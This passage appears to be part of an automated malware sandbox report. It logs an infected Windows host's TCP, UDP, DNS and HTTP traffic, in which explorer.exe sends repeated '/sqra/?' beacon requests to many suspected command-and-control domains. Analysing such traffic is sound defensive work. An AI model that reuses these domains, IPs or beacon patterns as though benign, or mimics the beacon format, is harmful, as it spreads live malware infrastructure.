                                                                        Apr 8, 2021 13:01:43.438338041 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:53.511909962 CEST4973980192.168.2.33.223.115.185
                                                                        Apr 8, 2021 13:01:53.613280058 CEST80497393.223.115.185192.168.2.3
                                                                        Apr 8, 2021 13:01:53.613374949 CEST4973980192.168.2.33.223.115.185
                                                                        Apr 8, 2021 13:01:53.613534927 CEST4973980192.168.2.33.223.115.185
                                                                        Apr 8, 2021 13:01:53.714488029 CEST80497393.223.115.185192.168.2.3
                                                                        Apr 8, 2021 13:01:53.714638948 CEST4973980192.168.2.33.223.115.185
                                                                        Apr 8, 2021 13:01:53.714705944 CEST4973980192.168.2.33.223.115.185
                                                                        Apr 8, 2021 13:01:53.815222025 CEST80497393.223.115.185192.168.2.3
                                                                        Apr 8, 2021 13:02:09.083940029 CEST4974180192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:02:09.097528934 CEST804974134.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:02:09.097733974 CEST4974180192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:02:09.097908020 CEST4974180192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:02:09.110999107 CEST804974134.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:02:09.276810884 CEST804974134.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:02:09.276844025 CEST804974134.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:02:09.277081013 CEST4974180192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:02:09.277164936 CEST4974180192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:02:09.289431095 CEST804974134.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:02:14.370769978 CEST4974380192.168.2.35.101.152.161
                                                                        Apr 8, 2021 13:02:14.416800976 CEST80497435.101.152.161192.168.2.3
                                                                        Apr 8, 2021 13:02:14.416882992 CEST4974380192.168.2.35.101.152.161
                                                                        Apr 8, 2021 13:02:14.417071104 CEST4974380192.168.2.35.101.152.161
                                                                        Apr 8, 2021 13:02:14.463047981 CEST80497435.101.152.161192.168.2.3
                                                                        Apr 8, 2021 13:02:14.472712994 CEST80497435.101.152.161192.168.2.3
                                                                        Apr 8, 2021 13:02:14.472744942 CEST80497435.101.152.161192.168.2.3
                                                                        Apr 8, 2021 13:02:14.472937107 CEST4974380192.168.2.35.101.152.161
                                                                        Apr 8, 2021 13:02:14.473036051 CEST4974380192.168.2.35.101.152.161
                                                                        Apr 8, 2021 13:02:14.519536018 CEST80497435.101.152.161192.168.2.3
                                                                        Apr 8, 2021 13:02:25.010373116 CEST4974580192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:02:25.045950890 CEST8049745160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:02:25.046082973 CEST4974580192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:02:25.046103954 CEST4974580192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:02:25.080661058 CEST8049745160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:02:25.084101915 CEST8049745160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:02:25.084125042 CEST8049745160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:02:25.084356070 CEST4974580192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:02:25.121117115 CEST8049745160.153.136.3192.168.2.3

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 13:00:07.338597059 CEST5020053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:07.358536959 CEST53502008.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:17.232925892 CEST5128153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:17.244834900 CEST53512818.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:19.018038034 CEST4919953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:19.030622959 CEST53491998.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:19.648319006 CEST5062053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:19.660247087 CEST53506208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:20.944005013 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:20.958472013 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:22.159974098 CEST6015253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:22.172446012 CEST53601528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:23.491069078 CEST5754453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:23.503777981 CEST53575448.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:24.491066933 CEST5598453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:24.504389048 CEST53559848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:25.762635946 CEST6418553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:25.775130987 CEST53641858.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:26.479413033 CEST6511053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:26.492727995 CEST53651108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:27.216310978 CEST5836153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:27.232398987 CEST53583618.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:28.413098097 CEST6349253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:28.425592899 CEST53634928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:34.204361916 CEST6083153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:34.216358900 CEST53608318.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:36.374424934 CEST6010053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:36.387712002 CEST53601008.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:37.448188066 CEST5319553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:37.461617947 CEST53531958.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:38.301493883 CEST5014153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:38.314387083 CEST53501418.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:39.567028999 CEST5302353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:39.585043907 CEST53530238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:41.680629015 CEST4956353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:41.693140030 CEST53495638.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:42.355730057 CEST5135253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:42.368622065 CEST53513528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:51.113428116 CEST5934953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:51.126154900 CEST53593498.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:56.316626072 CEST5708453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:56.328461885 CEST53570848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:59.163461924 CEST5882353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:59.198601007 CEST53588238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:00:59.891547918 CEST5756853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:00:59.924360991 CEST53575688.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:04.290524006 CEST5054053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:04.660743952 CEST53505408.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:09.928239107 CEST5436653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:09.946851015 CEST53543668.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:10.148154020 CEST5303453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:10.182096958 CEST53530348.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:15.401931047 CEST5776253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:15.433754921 CEST53577628.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:20.788542986 CEST5543553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:20.801280975 CEST53554358.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:25.979907036 CEST5071353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:26.011487961 CEST53507138.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:31.832477093 CEST5613253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:31.844346046 CEST53561328.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:32.237593889 CEST5898753192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:32.419924974 CEST53589878.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:35.520607948 CEST5657953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:35.539671898 CEST53565798.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:37.762571096 CEST6063353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:37.914891005 CEST53606338.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:42.984450102 CEST6129253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:43.101130009 CEST53612928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:48.364272118 CEST6361953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:48.380568981 CEST53636198.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:53.388469934 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:53.510649920 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:01:58.731199026 CEST6194653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:01:58.843024969 CEST53619468.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:03.885523081 CEST6491053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:04.030394077 CEST53649108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:07.096139908 CEST5212353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:07.109009981 CEST53521238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:09.047559023 CEST5613053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:09.082026958 CEST53561308.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:09.236921072 CEST5633853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:09.249553919 CEST53563388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:14.294907093 CEST5942053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:14.369541883 CEST53594208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 13:02:19.483746052 CEST5878453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 13:02:19.633713007 CEST53587848.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 8, 2021 13:00:59.163461924 CEST192.168.2.38.8.8.80xeda7Standard query (0)www.karizcustomizeme.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:04.290524006 CEST192.168.2.38.8.8.80x1c05Standard query (0)www.luxel01.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:10.148154020 CEST192.168.2.38.8.8.80x9af5Standard query (0)www.orchidandiris.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.401931047 CEST192.168.2.38.8.8.80x1e15Standard query (0)www.anadelalastra.artA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:25.979907036 CEST192.168.2.38.8.8.80xb731Standard query (0)www.ecomcourse.onlineA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:32.237593889 CEST192.168.2.38.8.8.80xb135Standard query (0)www.huongdandidong.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:37.762571096 CEST192.168.2.38.8.8.80xceaeStandard query (0)www.muzhskoy-eskort.siteA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:42.984450102 CEST192.168.2.38.8.8.80x72a2Standard query (0)www.simplyhealrhcareplans.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:48.364272118 CEST192.168.2.38.8.8.80x157cStandard query (0)www.opusleaf.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:53.388469934 CEST192.168.2.38.8.8.80xefdfStandard query (0)www.socialunified.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:58.731199026 CEST192.168.2.38.8.8.80xc268Standard query (0)www.myboardinghome.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:03.885523081 CEST192.168.2.38.8.8.80x4492Standard query (0)www.seymor-law.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:09.047559023 CEST192.168.2.38.8.8.80x8a9fStandard query (0)www.lewishackney.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:14.294907093 CEST192.168.2.38.8.8.80xeeacStandard query (0)www.shopthen2.siteA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:19.483746052 CEST192.168.2.38.8.8.80x9bc4Standard query (0)www.kaashir.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 8, 2021 13:00:59.198601007 CEST8.8.8.8192.168.2.30xeda7No error (0)www.karizcustomizeme.comkarizcustomizeme.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:00:59.198601007 CEST8.8.8.8192.168.2.30xeda7No error (0)karizcustomizeme.com160.153.136.3A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:04.660743952 CEST8.8.8.8192.168.2.30x1c05No error (0)www.luxel01.com118.27.122.19A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:10.182096958 CEST8.8.8.8192.168.2.30x9af5No error (0)www.orchidandiris.comorchidandiris.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:10.182096958 CEST8.8.8.8192.168.2.30x9af5No error (0)orchidandiris.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)www.anadelalastra.artext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:15.433754921 CEST8.8.8.8192.168.2.30x1e15No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:26.011487961 CEST8.8.8.8192.168.2.30xb731No error (0)www.ecomcourse.onlineecomcourse.onlineCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:26.011487961 CEST8.8.8.8192.168.2.30xb731No error (0)ecomcourse.online184.168.131.241A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:32.419924974 CEST8.8.8.8192.168.2.30xb135No error (0)www.huongdandidong.com108.186.210.142A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:37.914891005 CEST8.8.8.8192.168.2.30xceaeNo error (0)www.muzhskoy-eskort.site144.76.207.76A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:43.101130009 CEST8.8.8.8192.168.2.30x72a2No error (0)www.simplyhealrhcareplans.com199.59.242.153A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:48.380568981 CEST8.8.8.8192.168.2.30x157cName error (3)www.opusleaf.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:53.510649920 CEST8.8.8.8192.168.2.30xefdfNo error (0)www.socialunified.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:01:53.510649920 CEST8.8.8.8192.168.2.30xefdfNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:01:58.843024969 CEST8.8.8.8192.168.2.30xc268Server failure (2)www.myboardinghome.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:04.030394077 CEST8.8.8.8192.168.2.30x4492Name error (3)www.seymor-law.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:09.082026958 CEST8.8.8.8192.168.2.30x8a9fNo error (0)www.lewishackney.comlewishackney.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 13:02:09.082026958 CEST8.8.8.8192.168.2.30x8a9fNo error (0)lewishackney.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:14.369541883 CEST8.8.8.8192.168.2.30xeeacNo error (0)www.shopthen2.site5.101.152.161A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 13:02:19.633713007 CEST8.8.8.8192.168.2.30x9bc4No error (0)www.kaashir.com208.91.197.27A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.karizcustomizeme.com
                                                                        • www.luxel01.com
                                                                        • www.orchidandiris.com
                                                                        • www.anadelalastra.art
                                                                        • www.ecomcourse.online
                                                                        • www.huongdandidong.com
                                                                        • www.muzhskoy-eskort.site
                                                                        • www.simplyhealrhcareplans.com
                                                                        • www.socialunified.com
                                                                        • www.lewishackney.com
                                                                        • www.shopthen2.site

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.349720160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:00:59.241127968 CEST1246OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1
                                                                        Host: www.karizcustomizeme.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:00:59.275954008 CEST1246INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.349722118.27.122.1980C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:04.899665117 CEST1249OUTGET /sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.luxel01.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:05.137732983 CEST1250INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 11:01:05 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.3497435.101.152.16180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:02:14.417071104 CEST5418OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9 HTTP/1.1
                                                                        Host: www.shopthen2.site
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:14.472712994 CEST5418INHTTP/1.1 404 Not Found
                                                                        Server: nginx-reuseport/1.13.4
                                                                        Date: Thu, 08 Apr 2021 11:02:14 GMT
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Content-Length: 285
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 71 72 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 6f 70 74 68 65 6e 32 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /sqra/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.shopthen2.site Port 80</address></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.349745160.153.136.380C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:02:25.046103954 CEST5430OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy HTTP/1.1
                                                                        Host: www.karizcustomizeme.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:02:25.084101915 CEST5430INHTTP/1.1 400 Bad Request
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.34972434.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:10.195719004 CEST1254OUTGET /sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy HTTP/1.1
                                                                        Host: www.orchidandiris.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:10.374289989 CEST1255INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 11:01:10 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606eb0b7-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.349725198.185.159.14480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 13:01:15.579214096 CEST1258OUTGET /sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV HTTP/1.1
                                                                        Host: www.anadelalastra.art
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 13:01:15.762191057 CEST1259INHTTP/1.1 400 Bad Request
                                                                        Cache-Control: no-cache, must-revalidate
                                                                        Content-Length: 77564
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Date: Thu, 08 Apr 2021 11:01:15 UTC
                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                        Pragma: no-cache
                                                                        Server: Squarespace
                                                                        X-Contextid: QiQXTyH2/TdPoyy5I
                                                                        Connection: close
